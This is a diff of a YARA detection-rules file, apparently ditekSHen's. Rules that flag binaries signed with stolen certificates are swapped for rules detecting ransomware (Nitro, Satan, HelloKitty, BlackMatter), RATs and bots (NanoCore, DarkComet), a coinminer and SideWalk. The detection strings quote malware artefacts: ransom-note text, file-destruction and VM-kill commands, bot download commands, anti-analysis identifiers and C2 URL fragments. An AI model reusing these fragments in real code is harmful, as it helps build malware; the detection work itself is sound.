-		logic_hash = "7afafea141727e2ed4c1975a18aa77b282c7d9ece5729dbd96cbb49cc2b393f1"
+		logic_hash = "cc7f4599148c45fdf755c07530ae4846b7e283b5c1001c121f9ea05279997dc1"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		thumbprint = "ae7db8b64e8abd9d36876f049b9770d90c0868d7fe1a2d37cf327df69fa2dbfe"
-		reason = "Numando"
-		importance = 20
+
+	strings:
+		$s1 = "@login" ascii nocase
+		$s2 = "PRIVMSG" fullword ascii
+		$s3 = "JOIN" fullword ascii
+		$s4 = "PING :" fullword ascii
+		$s5 = "NICK" fullword ascii
+		$s6 = "USER" fullword ascii
+		$x1 = "irc.danger.net" fullword ascii nocase
+		$x2 = "evilBot" fullword ascii nocase
+		$x3 = "#evilChannel" fullword ascii nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Gary Kramlich" and pe.signatures [ i ] . serial == "f6:ad:45:18:8e:55:66:aa:31:7b:e2:3b:4b:8b:2c:2f" )
+		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) or 2 of ( $x* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_74Fc9257Bc86F8C618501695Ad4B1606 : FILE
+rule DITEKSHEN_MALWARE_Win_Nitro : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Nitro Ransomware"
 		author = "ditekSHen"
-		id = "c0ed5369-ca51-50b8-941a-580262b4f644"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8836-L8849"
+		id = "3edb62e0-0544-5291-a949-a45fdf881c7e"
+		date = "2024-11-01"
+		modified = "2024-11-01"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7628-L7652"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "d6a9956d8bcc717186c205d07b94df1df4818bee58f98bdc128ec569331ab5e6"
+		logic_hash = "03da21ece2de530a9c2ba08a9e44c9a92bc9ca0a6d4ac9507899d1f3dcd03e37"
 		score = 75
-		quality = 75
+		quality = 69
 		tags = "FILE"
-		thumbprint = "8ebbb2ab8f2e1366d0137e5026e07fde229f45f39d043c7ad36091b8eb2a923e"
-		reason = "ParallaxRAT"
-		importance = 20
+
+	strings:
+		$x1 = ".givemenitro" wide
+		$x2 = "Nitro Ransomware" ascii wide
+		$x3 = "\\NitroRansomware.pdb" ascii
+		$x4 = "NitroRansomware" ascii wide nocase
+		$s1 = "Valid nitro code was received" wide
+		$s2 = "discord nitro" ascii wide nocase
+		$s3 = "Starting file encryption" wide
+		$s4 = "NR_decrypt.txt" wide
+		$s5 = "open it unless you have the decryption key." ascii
+		$s6 = "<EncryptAll>b__" ascii
+		$s7 = "<DecryptAll>b__" ascii
+		$s8 = "DECRYPT_PASSWORD" fullword ascii
+		$s9 = "IsEncrypted" fullword ascii
+		$s10 = "CmdProcess_OutputDataReceived" fullword ascii
+		$s11 = "encryptedFileLog" fullword ascii
+		$s12 = "Encrypting:" fullword wide
+		$s13 = "decryption key. If you do so, your files may get corrupted" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "169Teaco Limited" and pe.signatures [ i ] . serial == "74:fc:92:57:bc:86:f8:c6:18:50:16:95:ad:4b:16:06" )
+		uint16( 0 ) == 0x5a4d and ( 3 of ( $x* ) or ( 3 of ( $s* ) and 1 of ( $x* ) ) or ( 7 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_3B0914E2982Be8980Aa23F49848555E5 : FILE
+rule DITEKSHEN_MALWARE_Win_Nanocore : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects NanoCore"
 		author = "ditekSHen"
-		id = "bda3e8b2-5d1b-5898-a4c3-318fc88506b8"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8851-L8864"
+		id = "931b98f6-df2b-538b-bc49-ecbbd24334da"
+		date = "2024-11-01"
+		modified = "2024-11-01"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7654-L7681"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b1ced5176720e0a3bd475172a167675de8211987fbae11b93eab1fba6b3629f5"
+		logic_hash = "6336260e0af2b4b51338ee066f41b7c58aa134a6c03ca110db7e088edf2b65a7"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "254e59ea93fa5f2a6af44f9631660f7b6cca4b4c9f97046405bcfed5589a32fa"
-		reason = "ParallaxRAT"
-		importance = 20
+
+	strings:
+		$x1 = "NanoCore Client" fullword ascii
+		$x2 = "NanoCore.ClientPlugin" fullword ascii
+		$x3 = "NanoCore.ClientPluginHost" fullword ascii
+		$i1 = "IClientApp" fullword ascii
+		$i2 = "IClientData" fullword ascii
+		$i3 = "IClientNetwork" fullword ascii
+		$i4 = "IClientAppHost" fullword ascii
+		$i5 = "IClientDataHost" fullword ascii
+		$i6 = "IClientLoggingHost" fullword ascii
+		$i7 = "IClientNetworkHost" fullword ascii
+		$i8 = "IClientUIHost" fullword ascii
+		$i9 = "IClientNameObjectCollection" fullword ascii
+		$i10 = "IClientReadOnlyNameObjectCollection" fullword ascii
+		$s1 = "ClientPlugin" fullword ascii
+		$s2 = "EndPoint" fullword ascii
+		$s3 = "IPAddress" fullword ascii
+		$s4 = "IPEndPoint" fullword ascii
+		$s5 = "IPHostEntr" fullword ascii
+		$s6 = "get_ClientSettings" fullword ascii
+		$s7 = "get_Connected" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Office Rat s.r.o." and pe.signatures [ i ] . serial == "3b:09:14:e2:98:2b:e8:98:0a:a2:3f:49:84:85:55:e5" )
+		uint16( 0 ) == 0x5a4d and ( 2 of ( $x* ) or 8 of ( $i* ) or all of ( $s* ) or ( 1 of ( $x* ) and ( 3 of ( $i* ) or 2 of ( $s* ) ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_029Bf7E1Cb09Fe277564Bd27C267De5A : FILE
+rule DITEKSHEN_MALWARE_Win_Satan : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Satan ransomware"
 		author = "ditekSHen"
-		id = "19d1012f-9a9e-5d84-885c-2571bfd1876c"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8866-L8879"
+		id = "f0a9369e-a3d7-5770-b490-4c9a919abb82"
+		date = "2024-11-01"
+		modified = "2024-11-01"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7683-L7709"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a8c817dc99d55dcbea31334cc10b6a7ae3b5cf831e28cb2daf9d4b06fb4bec60"
+		logic_hash = "e50daa88e0067a0f00329c6369c0334bd282fb102c91ba5ca770da97851d6d2e"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
-		thumbprint = "2b18684a4b1348bf78f6d58d3397ee5ca80610d1c39b243c844e08f1c1e0b4bf"
-		reason = "Lazarus"
-		importance = 20
+
+	strings:
+		$s1 = "S:(ML;;NRNWNX;;;LW)" fullword wide
+		$s2 = "recycle.bin" fullword wide
+		$s3 = "tmp_" fullword wide
+		$s4 = "%s%08x.%s" fullword wide
+		$s5 = "\"%s\" %s" fullword wide
+		$s6 = "/c \"%s\"" fullword wide
+		$s7 = "Global\\" fullword wide
+		$s8 = "rd /S /Q \"%s\"" fullword ascii
+		$s9 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1)" fullword ascii
+		$e1 = "*pdf*" fullword wide
+		$e2 = "*rtf*" fullword wide
+		$e3 = "*doc*" fullword wide
+		$e4 = "*docx*" fullword wide
+		$e5 = "*xlsx*" fullword wide
+		$e6 = "*pptx*" fullword wide
+		$e7 = "*moneywell*" fullword wide
+		$o1 = { 56 8d 54 24 34 b9 9e f0 ea be e8 c1 f9 ff ff 8d }
+		$o2 = { b9 34 f6 40 00 e8 ea 0b 00 00 85 c0 0f 84 91 }
+		$o3 = { 53 8d 84 24 34 01 00 00 b9 01 00 00 80 50 a1 64 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SAMOYAJ LIMITED" and pe.signatures [ i ] . serial == "02:9b:f7:e1:cb:09:fe:27:75:64:bd:27:c2:67:de:5a" )
+		uint16( 0 ) == 0x5a4d and ( ( 8 of ( $s* ) and 4 of ( $e* ) ) or all of ( $s* ) or ( all of ( $e* ) and 5 of ( $s* ) ) or ( all of ( $o* ) and 8 of them ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_984E84Cfe362E278F558E2C70Aaafac2 : FILE
+rule DITEKSHEN_MALWARE_Win_Neshta : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Neshta"
 		author = "ditekSHen"
-		id = "3d071d42-b96a-5491-96f5-4605b6b5584e"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8881-L8894"
+		id = "b96ee19e-b631-57fd-bf8a-67d790202c46"
+		date = "2024-11-01"
+		modified = "2024-11-01"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7711-L7720"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a3a42c5b6ad094deb2a9f33789b6f7e52f76e65b2336372341f16389cef40f88"
+		logic_hash = "7967c1154f652e28e541058a7b7f61aa077cfaf6be58282e1de68d9a6088c1ac"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "0b2d1dad72c69644f80ad871743878b5eb1e45e451d0d2c9579bdf81384f8727"
-		reason = "Quakbot"
-		importance = 20
+
+	strings:
+		$s1 = "Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus." fullword ascii
+		$s2 = "! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Arctic Nights Äkäslompolo Oy" and pe.signatures [ i ] . serial == "98:4e:84:cf:e3:62:e2:78:f5:58:e2:c7:0a:aa:fa:c2" )
+		uint16( 0 ) == 0x5a4d and all of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_45245Eef53Fcf38169C715Cf68F44452 : FILE
+rule DITEKSHEN_MALWARE_Linux_Hellokitty : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Linux version of HelloKitty ransomware"
 		author = "ditekSHen"
-		id = "3e92744d-1eb8-511a-b933-6dbe1e74fcfd"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8896-L8909"
+		id = "bb228937-8cd8-5fb8-aaed-3bd539ae96f2"
+		date = "2024-11-01"
+		modified = "2024-11-01"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7722-L7746"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "7667563aa02be9a85ba286bc16eb37380d5988b32f0ce27b1dbd9ae18b8b9175"
+		logic_hash = "bcb1188d616b29fa535e757a37476435a3061d27e143339413f6829876701868"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		thumbprint = "ad7edb1b0a6a1ee3297a8825aff090030142dce8b59b9261bc57ca86666b0cbe"
-		reason = "QuakBot"
-		importance = 20
+
+	strings:
+		$s1 = "exec_pipe:%s" ascii
+		$s2 = "Error InitAPI !!!" fullword ascii
+		$s3 = "No Files Found !!!" fullword ascii
+		$s4 = "Error open log File:%s" fullword ascii
+		$s5 = "%ld - Files Found  " fullword ascii
+		$s6 = "Total VM run on host:" fullword ascii
+		$s7 = "error:%d open:%s" fullword ascii
+		$s8 = "work.log" fullword ascii
+		$s9 = "esxcli vm process kill" ascii
+		$s10 = "readdir64" fullword ascii
+		$s11 = "%s_%d.block" fullword ascii
+		$s12 = "EVP_EncryptFinal_ex" fullword ascii
+		$s13 = ".README_TO_RESTORE" fullword ascii
+		$m1 = "COMPROMISED AND YOUR SENSITIVE PRIVATE INFORMATION WAS STOLEN" ascii nocase
+		$m2 = "damage them without special software" ascii nocase
+		$m3 = "leaking or being sold" ascii nocase
+		$m4 = "Data will be Published and/or Sold" ascii nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PAPER AND CORE SUPPLIES LTD" and pe.signatures [ i ] . serial == "45:24:5e:ef:53:fc:f3:81:69:c7:15:cf:68:f4:44:52" )
+		uint16( 0 ) == 0x457f and ( 6 of ( $s* ) or ( 2 of ( $m* ) and 2 of ( $s* ) ) or 8 of them )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_0406C4A1521A38C8D0C4Aa214388E4Dc : FILE
+rule DITEKSHEN_MALWARE_Win_Blackmatter : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects BlackMatter ransomware"
 		author = "ditekSHen"
-		id = "108dd1b8-110a-5680-bd96-5517392300fa"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8911-L8924"
+		id = "8883e652-edab-5cbf-a4fa-963b437447d9"
+		date = "2024-11-01"
+		modified = "2024-11-01"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7748-L7767"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "3db3a4f424d2974b746b8290a461f777eb88e0d8c6048e6e51e561c1f91b7747"
+		logic_hash = "4558002b424f7102f67fc44dfc37ac20f6013e25ae827c6aee0fc37231e2fa72"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "7d6dc731d94c9aaf241f3df940ce8ca8393380b12f92e872273ae747c5d4791f"
-		reason = "IcedID"
-		importance = 20
+
+	strings:
+		$s1 = "C:\\Windows\\System32\\*.drv" fullword wide
+		$s2 = "NYbr-Vk@" fullword ascii
+		$s3 = ":7:=:H:Q:W:\\:b:&;O;^;v;" fullword ascii
+		$o1 = { b0 34 aa fe c0 e2 fb b9 03 }
+		$o2 = { fe 00 ff 75 08 ff 75 0c ff b5 d8 fe ff ff ff b5 }
+		$o3 = { 6a 00 ff 75 0c ff b5 d8 fe ff ff ff b5 dc fe ff }
+		$o4 = { ff 75 08 ff 75 0c ff b5 d8 fe ff ff ff b5 dc fe }
+		$o5 = { 53 56 57 8d 85 70 ff ff ff 83 c0 0f 83 e0 f0 89 }
+		$o6 = { c7 85 68 ff ff ff 00 04 00 00 8b 85 6c ff ff ff }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Venezia Design SRL" and pe.signatures [ i ] . serial == "04:06:c4:a1:52:1a:38:c8:d0:c4:aa:21:43:88:e4:dc" )
+		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) and all of ( $o* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_5Ef27Fc51Ee80B30430947C9967Db440 : FILE
+rule DITEKSHEN_MALWARE_Win_Dlinjector04 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects downloader / injector"
 		author = "ditekSHen"
-		id = "53f7b334-8feb-5581-a64c-5db6558a6434"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8926-L8939"
+		id = "fe423aee-6ff4-5fd0-9fa2-51dd0c27f54b"
+		date = "2024-11-01"
+		modified = "2024-11-01"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7769-L7790"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e282054102d852c0f66435148ce97050b15fb6f60f5d1bfc875b02de9c50c297"
+		logic_hash = "ab9a047e53dec2cc5986522636783b5cb8aae7fc0297292d017ec22ee5750cce"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "c2dcc4a1ea16e45f86828e81eda20f83e70cbf77e152ddd80b1b4a730ef77551"
-		reason = "RedLineStealer"
-		importance = 20
+
+	strings:
+		$s1 = "Runner" fullword ascii
+		$s2 = "DownloadPayload" fullword ascii
+		$s3 = "RunOnStartup" fullword ascii
+		$a1 = "Antis" fullword ascii
+		$a2 = "antiVM" fullword ascii
+		$a3 = "antiSandbox" fullword ascii
+		$a4 = "antiDebug" fullword ascii
+		$a5 = "antiEmulator" fullword ascii
+		$a6 = "enablePersistence" fullword ascii
+		$a7 = "enableFakeError" fullword ascii
+		$a8 = "DetectVirtualMachine" fullword ascii
+		$a9 = "DetectSandboxie" fullword ascii
+		$a10 = "DetectDebugger" fullword ascii
+		$a11 = "CheckEmulator" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AMCERT,LLC" and pe.signatures [ i ] . serial == "5e:f2:7f:c5:1e:e8:0b:30:43:09:47:c9:96:7d:b4:40" )
+		uint16( 0 ) == 0x5a4d and ( ( all of ( $s* ) and 5 of ( $a* ) ) or 10 of ( $a* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_672237253A9B7Ef9D02D7D1Cb27A3Ff4 : FILE
+rule DITEKSHEN_MALWARE_Win_Darkcomet : FILE
 {
 	meta:
-		description = "No description has been set in the source file - DitekSHen"
+		description = "Detects DarkComet"
 		author = "ditekSHen"
-		id = "590b3764-c4e2-59a5-b263-bc3e0d57c85a"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "ae2412df-adae-5640-9404-7b093c5095b4"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8941-L8952"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7792-L7812"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9b989f8d89c566980f3f7e6490f0271ab0f531fb2717b55e6f3b7ff6fadd9144"
+		logic_hash = "444df3c914c47500018614af10036864b459e7873daf079b684352dbe52f0486"
 		score = 75
-		quality = 75
+		quality = 25
 		tags = "FILE"
-		thumbprint = "36a0f423c1fa48f172e4fecd06b8099f0ebbaeb8"
-		importance = 20
+
+	strings:
+		$s1 = "%s, ClassID: %s" ascii
+		$s2 = "%s, ProgID: \"%s\"" ascii
+		$s3 = "#KCMDDC51#" ascii
+		$s4 = "#BOT#VisitUrl" ascii
+		$s5 = "#BOT#OpenUrl" ascii
+		$s6 = "#BOT#Ping" ascii
+		$s7 = "#BOT#RunPrompt" ascii
+		$s8 = "#BOT#CloseServer" ascii
+		$s9 = "#BOT#SvrUninstall" ascii
+		$s10 = "#BOT#URLUpdate" ascii
+		$s11 = "#BOT#URLDownload" ascii
+		$s12 = /BTRESULT(Close|Download|HTTP|Mass|Open|Ping\|Respond|Run|Syn|UDP|Uninstall\|uninstall|Update|Visit)/ ascii
+		$s13 = "dclogs\\" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Foshan Yongqiheng Trading Co., Ltd." and pe.signatures [ i ] . issuer contains "Certum Extended Validation Code Signing 2021 CA" and pe.signatures [ i ] . serial == "67:22:37:25:3a:9b:7e:f9:d0:2d:7d:1c:b2:7a:3f:f4" )
+		uint16( 0 ) == 0x5a4d and 4 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_708737C791C878D6Dd7B7C43 : FILE
+rule DITEKSHEN_MALWARE_Win_Macoute : FILE
 {
 	meta:
-		description = "No description has been set in the source file - DitekSHen"
+		description = "Detects Macoute"
 		author = "ditekSHen"
-		id = "65f3827d-25c4-59bb-8555-508c3e92ed5d"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "0ecfb923-2e51-544e-984d-efdeeb175727"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8954-L8965"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7814-L7836"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "5e47fc7ed52e57aafc5eb2f1d56eb8296080218b65d70879bd75fd1a0ac58f66"
+		logic_hash = "1dffa48fe6c0ac053509b5f5994d323fd72d090da0f077b52c9bc33df6997964"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "7ed7081ee612fbf9fe0ade46f4a2749da20251e0"
-		importance = 20
+
+	strings:
+		$s1 = "scp%s%s%s%s" ascii
+		$s2 = "putfile %s %s" ascii
+		$s3 = "pscp|%s|%s:%s" ascii
+		$s4 = "connect %host %port\\n" ascii
+		$s5 = "/ecoute/spool/%s-%lu" ascii
+		$s6 = "<f n=\"%s\" s=\"%lu\" d=\"%d-%d-%d\"/>" ascii
+		$s7 = "CMPT;%s;%s;%s;%s;%s" ascii
+		$s8 = "%s\\apoScreen%lu.dll" ascii
+		$s9 = "/cap/%s%lu.jpg" ascii
+		$s10 = "INFO;%u;%u;%u;%d;%d;%d;%d;%d;%d;%d;%s" ascii
+		$s11 = "SUBJECT: %s is comming!" ascii
+		$s12 = "Content-type: multipart/mixed; boundary=\"#BOUNDARY#\"" ascii
+		$s13 = "FROM: %s@yahoo.com" ascii
+		$s14 = "<html><script language=\"JavaScript\">window.open(\"readme.eml\", null,\"resizable=no,top=6000,left=6000\")</script></html>" ascii
+		$s15 = "<html><HEAD></HEAD><body bgColor=3D#ffffff><iframe src=3Dcid:THE-CID height=3D0 width=3D0></iframe></body></html>" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Langfang Alkem Material Technology Co., Ltd." and pe.signatures [ i ] . issuer contains "GlobalSign GCC R45 EV CodeSigning CA 2020" and pe.signatures [ i ] . serial == "70:87:37:c7:91:c8:78:d6:dd:7b:7c:43" )
+		uint16( 0 ) == 0x5a4d and 10 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_0Bc777F88Ddf5F3Ce479452F : FILE
+rule DITEKSHEN_MALWARE_Win_Coinminer04 : FILE
 {
 	meta:
-		description = "No description has been set in the source file - DitekSHen"
+		description = "Detects coinmining malware"
 		author = "ditekSHen"
-		id = "da891fe8-fe9f-53f8-836c-161d13fd5382"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "d90d8ad3-20b7-5bb4-8c58-3488c60ed9a2"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8967-L8978"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7838-L7858"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "988fd5e652910f7b4388fe5bed91195261ff95d84cc7e53a389432577a114baa"
+		logic_hash = "2ef60dbf0bac3d5910635bb011a45e5ebc1392094b10425604fa9dd290198f8b"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "55aa40dea5621f0c0fbc8b9dd8066ff2290a7e82"
-		importance = 20
+
+	strings:
+		$s1 = "createDll" fullword ascii
+		$s2 = "getTasks" fullword ascii
+		$s3 = "SetStartup" fullword ascii
+		$s4 = "loadUrl" fullword ascii
+		$s5 = "Processer" fullword ascii
+		$s6 = "checkProcess" fullword ascii
+		$s7 = "runProcess" fullword ascii
+		$s8 = "createDir" fullword ascii
+		$cnc1 = "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0" fullword wide
+		$cnc2 = "?hwid=" fullword wide
+		$cnc3 = "?timeout=1" fullword wide
+		$cnc4 = "&completed=" fullword wide
+		$cnc5 = "/cmd.php" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ARION LLC" and pe.signatures [ i ] . issuer contains "GlobalSign GCC R45 EV CodeSigning CA 2020" and pe.signatures [ i ] . serial == "0b:c7:77:f8:8d:df:5f:3c:e4:79:45:2f" )
+		uint16( 0 ) == 0x5a4d and ( 5 of ( $s* ) and 1 of ( $cnc* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_691Ed2236Cca78D180F29Dfd : FILE
+rule DITEKSHEN_MALWARE_Win_Sidewalk : FILE
 {
 	meta:
-		description = "No description has been set in the source file - DitekSHen"
+		description = "Detects SideWalk"
 		author = "ditekSHen"
-		id = "f889f1a6-070d-505e-aaa6-0d454f52a876"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "ab82b83a-a279-555a-83c2-6340431b10da"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8980-L8991"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7860-L7880"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "94e7c3aea1fca253395eae398176dc9875ca1f1c13002063b5eda8ffb4ad973f"
+		logic_hash = "6885a1ad69d61fa5875ee0db949071e84390fc2db4307c412b32cd17c0806f6a"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "8c8a043f51bb8d59182fb268c0db2f1b9d876dbe"
-		importance = 20
+
+	strings:
+		$s1 = "Decommit" fullword ascii
+		$s2 = "Shellc0deRunner" fullword ascii
+		$s3 = "shellc0de" fullword ascii
+		$s4 = "C:\\Windows\\System32\\msdt.exe" fullword wide
+		$s5 = "StartProcessWOPid" fullword ascii
+		$s6 = "StartProcessWithParent" fullword ascii
+		$m1 = "alloctype" fullword ascii
+		$m2 = "ThreadIoPriority" fullword ascii
+		$m3 = "PebAddress" fullword ascii
+		$m4 = "dotnet.4.x64.dll" fullword wide
+		$m5 = "LogonNetCredentialsOnly" fullword ascii
+		$m6 = "ThreadIdealProcessor" fullword ascii
+		$m7 = "LogonWithProfile" fullword ascii
 
 	condition:
